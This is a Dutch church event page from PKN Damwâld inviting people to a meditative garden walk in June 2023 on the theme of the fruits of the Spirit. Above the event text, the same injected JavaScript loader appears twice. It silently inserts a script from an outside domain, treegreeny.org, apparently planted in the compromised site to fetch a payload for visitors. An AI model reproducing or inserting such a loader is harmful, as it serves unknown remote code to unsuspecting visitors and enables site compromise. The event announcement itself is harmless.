;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Een “meditatieve” tuinwandeling op 24 juni 2023 … Vruchten van de Geest - PKN Damwâld
24 juni 2023
14:00 t/m 17:00
Een “meditatieve” tuinwandeling op 24 juni 2023 … Vruchten van de Geest

We willen iedereen uitnodigen voor een wandeling door ‘Het kleine Paradijs’, de tuin van Annie en Fokke Venema, Romkeloane 8 in Damwâld. De tuin staat op deze dagen in het teken van ‘De vruchten van de Geest”. In het decor van Gods prachtige schepping kunnen mooie voorwerpen (symbolen) worden bewonderd met daarbij inspirerende teksten over de vruchten van de Geest.

Tijdens de tuinwandeling ga je deze vruchten van de Geest een voor een langs. Je wordt uitgenodigd om mee te gaan, als het ware rond te kijken in de tuin van je hart, om te zien wat daar al groeit en bloeit dankzij de inwerking van de Geest, maar ook om te zien wat onderhoud nodig heeft en waarbij je dan de hulp van Gods Geest mag inroepen. Een tuinwandeling met aandacht voor natuurbeleving, inspiratie, ontmoeting en verbinding, met de natuur, met elkaar, maar bovenal met God.

Een heerlijke fruitschaal zet Paulus je voor in Galaten 5, 22-23. Mooie eigenschappen die je bij jezelf mag ontdekken als de Heilige Geest met jou aan het werk gaat. Eigenschappen om je eigen te maken, om in te groeien, om bij jezelf te laten ontwikkelen.

Helaas is vanwege hoogteverschillen een (tweede) deel van de tuin minder of niet toegankelijk voor mensen die slecht ter been zijn. (maar misschien kunt u wel gearmd met iemand wandelen)

De tuinwandeling kan worden gemaakt op donderdagavond 22 juni tussen 19.00 uur en 21.00 uur of op zaterdagmiddag 24 juni tussen 14.00 en 17.00 uur. Bij slecht weer kan het niet doorgaan helaas, we kijken dan naar een alternatieve datum. Aanmelden is niet nodig en de koffie staat klaar.

Namens het team wijkavonden.